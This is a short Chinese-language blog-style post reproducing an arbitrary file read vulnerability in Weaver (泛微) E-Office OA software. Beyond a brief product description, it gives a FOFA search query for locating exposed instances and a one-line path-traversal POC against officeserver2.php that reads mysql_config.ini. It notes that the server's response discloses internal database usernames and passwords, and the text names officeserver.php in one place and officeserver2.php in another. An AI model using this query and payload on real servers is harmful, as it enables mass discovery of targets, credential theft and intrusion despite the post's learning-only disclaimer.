E-Office(泛微OA)前台任意文件读取漏洞复现

简介

泛微E-Office是一款企业级的全流程办公自动化软件，它包括协同办公、文档管理、知识管理、工作流管理等多个模块，涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。

officeserver.php文件存在任意文件读取漏洞，通过漏洞可以下载服务器上的任意文件。

漏洞复现

FOFA语法：

app="泛微-EOffice" && icon_hash="1578525679"

访问后页面如下：

POC：

/iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini

响应返回页面获取到内网区域数据库用户名和密码

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

---

结语

没有人规定，一朵花一定要成长为向日葵或者玫瑰。